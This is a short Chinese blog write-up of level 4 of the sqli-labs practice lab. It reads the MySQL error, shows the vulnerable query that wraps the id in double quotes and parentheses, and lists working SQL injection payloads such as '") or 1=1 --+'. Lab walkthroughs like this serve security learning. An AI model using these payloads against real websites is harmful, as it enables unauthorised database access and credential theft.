Sqli-labs less 4

Less-4

我们使用?id=1"

注入代码后,我们得到像这样的一个错误:

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '"1"") LIMIT 0,1' at line 1

这里它意味着,代码当中对id参数进行了 "" 和 () 的包装。

所以我们再用这样的代码来进行注入:

?id=1") –-+

这样一来,我们便可以得到用户名和密码了,同时后面查询也已经被注释掉了。

在源代码中的SQL查询语句,31行:

$sql="SELECT * FROM users WHERE id=("$id") LIMIT 0,1";

可以成功注入的有:

") or "1"=("1
") or 1=1 --+

其余的payload与less1中一直,只需要将less1中的 ' 更换为 ") 。

posted @ 2016-08-11 23:04  lcamry  阅读(1282)  评论(0编辑  收藏  举报